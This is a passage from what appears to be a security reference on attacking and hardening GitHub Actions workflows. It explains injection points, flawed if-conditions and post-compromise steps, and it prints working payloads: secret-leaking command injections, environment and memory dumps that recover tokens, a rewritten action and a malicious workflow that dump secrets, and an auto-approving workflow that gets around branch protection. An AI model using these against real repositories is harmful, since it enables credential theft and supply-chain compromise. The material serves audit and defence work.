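// core.setSecret(apiToken) is never called, so the value is not masked
core.debug(`Calling the API with token ${apiToken}`);   // printed when step debug logging is enabled
```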
The workflow log discloses the token in plaintext:
GitHub context
JavaScript actions can access the GitHub context via @actions/github; github-script provides the context object to access the GitHub context:
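A short sketch of both access patterns:

```javascript
// JavaScript action
const github = require('@actions/github');

const title = github.context.payload.pull_request.title;   // user-controlled
```

```yaml
# actions/github-script
- uses: actions/github-script@v6
  with:
    script: |
      const title = context.payload.pull_request.title;    // user-controlled
```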
The following variables in the GitHub context are controlled by a user:
- `context.payload.pull_request.title`
- `context.payload.pull_request.body`
- `context.payload.pull_request.head.ref`
- `context.payload.pull_request.head.label`
- `context.payload.pull_request.head.repo.default_branch`
- `context.payload.pull_request.head.repo.description`
- `context.payload.pull_request.head.repo.homepage`
- `context.payload.issue.body`
- `context.payload.issue.title`
- `context.payload.comment.body`
- `context.payload.discussion.body`
- `context.payload.discussion.title`
These variables can be used as a source to pass arbitrary data to vulnerable code.
Octokit GraphQL API injection
@actions/github allows making GraphQL requests (check https://github.com/octokit/graphql.js for the API); github-script provides the github object to access the octokit client:
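A sketch of the vulnerable pattern (the query is illustrative):

```yaml
- uses: actions/github-script@v6
  with:
    script: |
      // the user-controlled branch name is concatenated into the GraphQL document
      const result = await github.graphql(`
        query {
          repository(owner: "${context.repo.owner}", name: "${context.repo.repo}") {
            ref(qualifiedName: "${{ github.head_ref }}") { name }
          }
        }
      `);
```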
If user-controlled data (inputs, GitHub context, etc.) is passed directly to the `query`, it can lead to an injection into the GraphQL request.
There is octokit/graphql-action which can be vulnerable to the injection as well, check out Contexts misusing
Octokit REST API injection
@actions/github allows making requests to the REST API (check https://octokit.github.io/rest.js for the API); github-script provides the github object to access the octokit client:
If user-controlled data (inputs, GitHub context, etc.) is passed directly to the request methods (such as `github.request()`), it can lead to injection into requests to the REST API:
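A sketch of the vulnerable pattern:

```yaml
- uses: actions/github-script@v6
  with:
    script: |
      // the user-controlled value becomes part of the request route
      await github.request(`GET /repos/${{ github.event.pull_request.head.repo.full_name }}/contents/README.md`);
```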
There is octokit/request-action which can be vulnerable to the injection as well, check out Contexts misusing
Docker action
A Docker container action is used to run a Docker container and execute code in Docker. Since a Docker container action runs scripts written in different languages (bash, python, go, etc.), it can also be vulnerable to common weaknesses like code and command injection, path traversal, etc.
Disclosure of sensitive data
New sensitive data may appear during the execution of Docker container actions, such as temporary tokens, retrieved data, etc. GitHub Actions allows developers to mask this data in logs using the add-mask workflow command. So, if `add-mask` is not used or workflow command processing has been stopped, sensitive data can leak into the run logs.
Using a malicious docker image
In addition to a local `Dockerfile` in a repository, third-party Docker images from a registry can be used. Therefore, these Docker images may be vulnerable, causing the container to be compromised.
References:
Sensitive mounts
The GitHub Runner passes part of the environment variables and mounts volumes when running a Docker container:
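An abbreviated sketch of the `docker run` invocation, showing only the mounts relevant to the points below (the full command contains many more arguments):

```bash
docker run \
  -v "/var/run/docker.sock":"/var/run/docker.sock" \
  -v "/home/runner/work/<repo>/<repo>":"/github/workspace" \
  ...
```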
Here it is worth paying attention to at least the following things:
- The exposed Docker socket at `/var/run/docker.sock`. It allows an attacker to escape from the container. Please check out Container: Escaping - Exposed Docker Socket.
- `/github/workspace` is a folder with the repository content. For example, an attacker can grab a repository token from the `/github/workspace/.git/config` file, check out the "Exfiltrating data from a runner" section.
Unclaimed actions
Third-party actions may be available for claiming because the namespace (username or organization name) has been changed or removed. If the namespace has been changed, GitHub will redirect the old namespace to the new one, and thus workflows that use the actions with the old namespace will continue to execute successfully. In this case, an attacker can try to claim the old namespace by registering a user or creating an organization. If this is possible, an attacker can create a malicious action which will later be executed by workflows that use actions with the claimed namespace.
References:
Reusing vulnerable workflows
GitHub Actions allows making workflows reusable using the workflow_call event. It allows calling a reusable workflow from another workflow by anyone who has access to this workflow:
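A minimal sketch of such a reusable workflow; the input and secret names follow the description below, and exposing the secret via an environment variable is an assumption:

```yaml
# .github/workflows/reusable.yml
on:
  workflow_call:
    inputs:
      username:
        required: true
        type: string
    secrets:
      envPAT:
        required: true

jobs:
  greet:
    runs-on: ubuntu-latest
    env:
      PAT: ${{ secrets.envPAT }}
    steps:
      - run: echo "Hello ${{ inputs.username }}"   # the input is interpolated into the shell script
```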
Reusable workflows are very similar to third-party actions. They are run in the context of a called workflow and allow defining inputs. Therefore, reusable workflows may misuse user-controlled input or context variables, which could lead to the same vulnerabilities that are described for workflows and third-party actions on this page.
The reusable workflow from the snippet above is vulnerable to command injection. If the `username` input variable is controlled by an attacker, they can leak `envPAT` using the following payload as `username`:
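For instance (base64 is used to get around secret masking in the logs; the exact payload depends on how the secret is exposed in the sketch above):

```
"; echo $PAT | base64; echo "
```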
Another example is the following workflow, which checks out code from an incoming PR and runs `npm install` against it:
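A hedged sketch of such a reusable workflow (the way the PR ref is passed is an assumption):

```yaml
on:
  workflow_call:
    inputs:
      ref:
        required: true
        type: string

jobs:
  install:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          ref: ${{ inputs.ref }}   # e.g. the head SHA of an incoming pull request
      - run: npm install           # executes lifecycle scripts from the untrusted package.json
```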
References:
Vulnerable if-conditions
The `if` condition is used in a workflow file to determine whether a step should run. When an `if` conditional is `true`, the step will run. It can be useful from a security perspective as well. For example, the following `if` statement can be used to allow only pull requests from the base repository:
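A common form of such a check:

```yaml
if: github.event.pull_request.head.repo.full_name == github.repository
```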
However, these `if` conditions can themselves be flawed and not produce the behaviour that was originally expected.
Incorrect comparison
Expressions use case-insensitive string comparison, which can be misused when implementing protections. For example, the following `if` condition will be `true`:
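For instance (the values are illustrative):

```yaml
if: ${{ 'admin' == 'ADMIN' }}
```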
GitHub provides the `contains()` function that can be used in an `if` condition incorrectly. For example, in the following snippet an author has restricted the execution of the step to bots only using `contains()`:
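A sketch of such a check (the exact condition is an assumption):

```yaml
if: contains(github.actor, 'bot')
```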
However, this condition can be easily met by creating a new bot.
Labels on PRs
One approach to control the workflow execution is to use labels on pull requests. This is possible because a label on a pull request can only be set by a project member. As a result, it allows running a workflow only after a project member has reviewed a pull request and set an appropriate label:
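A sketch of a label-gated workflow (note the `synchronize` activity type, which is what makes the bypass below possible):

```yaml
on:
  pull_request_target:
    types: [labeled, synchronize]

jobs:
  test:
    if: contains(github.event.pull_request.labels.*.name, 'approved')
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci && npm test
```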
If a workflow uses the pull_request or pull_request_target events with the `synchronize` activity type, it will be triggered when the head repository is updated. Since new changes to a pull request do not remove labels, the `if` condition in the example above can be bypassed like this:
1. Create a pull request with valid changes.
2. Wait for the label to be set.
3. Update the pull request with malicious code.
4. The update will trigger the workflow.
Misusing context variables
Using wrong context variables can cause an `if` condition to always be `true` or `false` regardless of the situation. For example, the following `if` condition uses the `github.event.pull_request.base.repo.full_name` variable instead of `github.event.pull_request.head.repo.full_name` to ignore pull requests from forks:
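A sketch of the flawed condition:

```yaml
# base.repo always refers to the target repository, so this is true even for forks
if: github.event.pull_request.base.repo.full_name == github.repository
```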
However, this condition will always be `true`. The same behaviour will be achieved if `github.repository` is used for comparing against the repository name:
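For example (the repository name is a placeholder):

```yaml
# github.repository is always the repository the workflow runs in
if: github.repository == 'example-org/example-repo'
```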
Skipping mandatory checks
A workflow can implement various types of checks during running. For example, it can check if an actor is a member of an organization or if they have write permissions for the current repository. This can be done using third-party actions or a custom validation based on the GitHub API. However, not all such actions interrupt execution if a check fails, some of them return a boolean value for subsequent verification. For instance, the following snippet shows a check for the presence of an actor in an org team:
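A hedged sketch of such a check; the membership action and its inputs are assumptions, the important detail is the missing `id:`:

```yaml
- name: Fetch team member list
  uses: tspascoal/get-user-teams-membership@v1
  with:
    username: ${{ github.actor }}
    team: maintainers
    GITHUB_TOKEN: ${{ secrets.READ_ORG_TOKEN }}
- name: Stop workflow if user is not a team member
  if: ${{ steps.checkUserMember.outputs.isTeamMember == 'false' }}
  run: |
    echo "You are not allowed to run this workflow"
    exit 1
```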
Nevertheless, the snippet above is vulnerable because there is no `id:` field for the `Fetch team member list` step. As a result, `${{ steps.checkUserMember.outputs.isTeamMember == 'false' }}` is always `false`. So, the fixed version looks like the following:
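The same sketch with the missing `id:` added:

```yaml
- name: Fetch team member list
  id: checkUserMember
  uses: tspascoal/get-user-teams-membership@v1
  with:
    username: ${{ github.actor }}
    team: maintainers
    GITHUB_TOKEN: ${{ secrets.READ_ORG_TOKEN }}
- name: Stop workflow if user is not a team member
  if: ${{ steps.checkUserMember.outputs.isTeamMember == 'false' }}
  run: |
    echo "You are not allowed to run this workflow"
    exit 1
```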
Unclaimed or incorrect usernames
If the workflow uses something like this:
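For instance (the usernames are placeholders):

```yaml
if: github.actor == 'trusted-maintainer' || github.actor == 'release-bot'
```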
Make sure all these users exist as they may have already been deleted or misspelled.
The potential impact of a compromised runner workflow
Workflows triggered using the `pull_request` event have read-only permissions and have no access to secrets. However, these permissions differ for various event triggers such as `issue_comment`, `issues` or `push`, where you could attempt to steal repository secrets or use the write permission of the job's GITHUB_TOKEN.
`GITHUB_TOKEN` is the same token that GitHub Apps use. For information about the API endpoints GitHub Apps can access with each permission, check out the "GitHub App Permissions" page. You can find the permissions for `GITHUB_TOKEN` in a workflow log in the `Set up job` step.
References:
Accessing secrets through environment variables
If secrets are passed to an environment variable, you can directly access them in the following ways:
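For example, assuming command execution in a step whose environment contains the secret:

```bash
printenv SECRET_TOKEN | base64   # base64 defeats the masking of the exact secret value in the log
env | base64                     # or dump the whole environment
```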
Accessing secrets from the run: step
If a secret is used directly in an expression `${{ }}` in the `run:` block, like:
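For example (the script name is a placeholder):

```yaml
- run: ./publish.sh --token "${{ secrets.PUBLISH_TOKEN }}"
```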
the generated shell script will be stored on disk in the `/home/runner/work/_temp/` folder. This script contains the secret in plain text, because GitHub Runner evaluates the expressions inside `${{ }}` and substitutes them with the resulting values before running the script in the `run:` block. Therefore, the secret can be accessed with the following command:
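For instance (the generated scripts have random names; base64 defeats secret masking in the log):

```bash
cat /home/runner/work/_temp/*.sh | base64
```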
Note that this behavior is independent of shell settings.
Accessing secrets through rewriting third-party actions
If you have an arbitrary command execution in front of a third-party action that handles secrets:
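For example (the injectable first step and the action inputs are illustrative; `fakeaction/publish@v3` matches the example below):

```yaml
steps:
  - name: Print PR title
    run: echo "${{ github.event.pull_request.title }}"   # injectable
  - name: Publish
    uses: fakeaction/publish@v3
    with:
      token: ${{ secrets.PUBLISH_TOKEN }}
```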
You can steal secrets by rewriting third-party action code. GitHub Runner checks out all third-party action repositories during the `Set up` step and saves them to the `/home/runner/work/_actions/` folder. For example, `fakeaction/publish@v3` will be checked out to the `/home/runner/work/_actions/fakeaction/publish/v3/` folder. Therefore, you can rewrite a third-party action with a malicious one using command injection to access secrets.
The easiest way is to override the `action.yml` file with a composite action that leaks secrets:
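A sketch of a replacement `action.yml` (the input name must match what the workflow passes; base64 defeats secret masking in the log):

```yaml
name: 'publish'
inputs:
  token:
    required: true
runs:
  using: 'composite'
  steps:
    - run: echo "${{ inputs.token }}" | base64
      shell: bash
```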
Leaking repository and organization secrets by adding a malicious workflow
GitHub no longer allows modifying files in the `.github/workflows` folder or merging a branch from forks with changes in the `.github/workflows` folder using `GITHUB_TOKEN`. You need a personal access token with the `repo` and `workflow` scopes to be able to add a malicious workflow.
Usually, non-default branches have no branch protection rules. If you have access to `GITHUB_TOKEN` with the `pull_requests:write` scope, you can add an arbitrary workflow to a non-default branch. Since the `pull_request_target` workflow in non-default branches can be triggered by a user, you can leak all repository and organization secrets using the following steps:
1. Fork the target repo.
2. Add a malicious `pull_request_target` workflow (see the sketch after this list).
3. Create a pull request to a non-default branch.
4. Merge the pull request using `GITHUB_TOKEN` with the `pull_requests:write` scope (see the API request after this list).
5. After merging the pull request, open a pull request to the non-default branch from the fork.
6. Wait for the malicious workflow to complete. It will leak all secrets to the logs.
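A hedged sketch of step 2; dumping the `secrets` context base64-encoded is one way to get around log masking:

```yaml
# .github/workflows/leak.yml (on the non-default branch)
on: pull_request_target

jobs:
  leak:
    runs-on: ubuntu-latest
    steps:
      - run: echo "$ALL_SECRETS" | base64
        env:
          ALL_SECRETS: ${{ toJSON(secrets) }}
```

And a sketch of step 4, using the pull request merge endpoint of the REST API (the repository and pull request number are placeholders):

```bash
curl -X PUT \
  -H "Authorization: token $GITHUB_TOKEN" \
  -H "Accept: application/vnd.github+json" \
  https://api.github.com/repos/<OWNER>/<REPO>/pulls/<PULL_NUMBER>/merge
```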
If `GITHUB_TOKEN` has the `contents:write` scope, you can create a new non-default branch using the following API request:
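A sketch of the request (the branch name and base SHA are placeholders):

```bash
curl -X POST \
  -H "Authorization: token $GITHUB_TOKEN" \
  -H "Accept: application/vnd.github+json" \
  https://api.github.com/repos/<OWNER>/<REPO>/git/refs \
  -d '{"ref": "refs/heads/new-branch", "sha": "<BASE_COMMIT_SHA>"}'
```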
Exfiltrating secrets from a runner
An attacker can exfiltrate any stored secrets or other data from a runner. Actions and scripts may store sensitive data on the filesystem:
- `.git/config`: the actions/checkout action by default stores the repository token in the `.git/config` file unless the `persist-credentials: false` argument is set.
- `$HOME/.jira.d/credentials`
- `$HOME/.azure`: the Azure/login action by default uses the Azure CLI for login, which stores the credentials in the `$HOME/.azure` folder.
- `$HOME/.docker/config.json`: Docker registry login actions (for example, docker/login-action) store registry credentials here.
- `$GITHUB_WORKSPACE/gha-creds-<RANDOM_FILENAME>.json`
- `$HOME/.terraformrc`
Exfiltrating secrets from memory
Any secrets that are used by a workflow are passed to the GitHub Runner at startup; therefore secrets are placed in the process's memory. You can try to exfiltrate secrets from the memory dump.
`GITHUB_TOKEN` is always passed to the runner, even if it is not referenced in a workflow or included action.
You can use the following script to dump the memory and find `GITHUB_TOKEN`:
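A hedged sketch of such a script; it assumes passwordless `sudo` and `gcore` (part of gdb) are available on the runner, and that the token uses the `ghs_` prefix of GitHub App installation tokens:

```bash
#!/bin/bash
# dump the memory of the Runner.Worker process and grep for the token
pid=$(pgrep -f Runner.Worker | head -n 1)
sudo gcore -o /tmp/worker "$pid"
grep -a -o 'ghs_[0-9A-Za-z]\{20,\}' /tmp/worker.* | sort -u
```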
Approving pull requests
As of May 2022, creating and approving pull requests by GitHub Actions is disabled for all new repositories and organizations by default, check out GitHub Docs: Preventing GitHub Actions from creating or approving pull requests
You can grant write permissions on the pull requests API endpoint and use the API to approve a pull request. It can be used to bypass branch protection rules when a main branch requires 1 approval and does not require review from code owners.
For instance, if you can write to non-main branches of a repository, you can bypass the protection using the following steps:

1. Create a branch and add a workflow that approves pull requests (see the sketch after this list).
2. Create a pull request.
3. The pull request will require approval.
4. Once the action is complete, the github-actions bot will approve the changes.
5. You can merge the changes to the main branch.
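A hedged sketch of step 1, using the pull request reviews endpoint to approve the triggering pull request:

```yaml
name: auto-approve
on: pull_request

permissions:
  pull-requests: write

jobs:
  approve:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -X POST \
            -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
            -H "Accept: application/vnd.github+json" \
            https://api.github.com/repos/${{ github.repository }}/pulls/${{ github.event.pull_request.number }}/reviews \
            -d '{"event": "APPROVE"}'
```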
Modifying the contents of a repository
An attacker can use the GitHub API to modify repository content, including releases, if the assigned permissions of `GITHUB_TOKEN` are not restricted.
References:
Access cloud services via OpenID Connect
If a vulnerable workflow has the `GITHUB_TOKEN` with the `id-token:write` scope, you can request the OIDC JWT ID token to access cloud resources.
References:
Trigger workflow_dispatch workflows
`GITHUB_TOKEN` with the `actions:write` scope can be used to create a workflow dispatch event via the API. It allows triggering workflows using the workflow_dispatch event and expanding the attack surface.
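A sketch of the request (owner, repository, workflow file name and inputs are placeholders):

```bash
curl -X POST \
  -H "Authorization: token $GITHUB_TOKEN" \
  -H "Accept: application/vnd.github+json" \
  https://api.github.com/repos/<OWNER>/<REPO>/actions/workflows/<WORKFLOW_FILE>/dispatches \
  -d '{"ref": "main", "inputs": {"key": "value"}}'
```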
In the request above, you can control workflow arguments using the `inputs` parameter. If a workflow does not properly handle data from the `inputs` context, you might get command execution.
References:
Trigger repository_dispatch workflows
`GITHUB_TOKEN` with the `metadata:read` and `contents:read&write` scopes can be used to create a repository dispatch event via the API. It allows triggering workflows using the repository_dispatch event and expanding the attack surface.
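A sketch of the request (the event type and payload are placeholders):

```bash
curl -X POST \
  -H "Authorization: token $GITHUB_TOKEN" \
  -H "Accept: application/vnd.github+json" \
  https://api.github.com/repos/<OWNER>/<REPO>/dispatches \
  -d '{"event_type": "custom-event", "client_payload": {"key": "value"}}'
```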
In the request above, you can control workflow arguments using the `client_payload` parameter. If a workflow does not properly handle data from the `github.event.client_payload` context, you might get command execution.
References: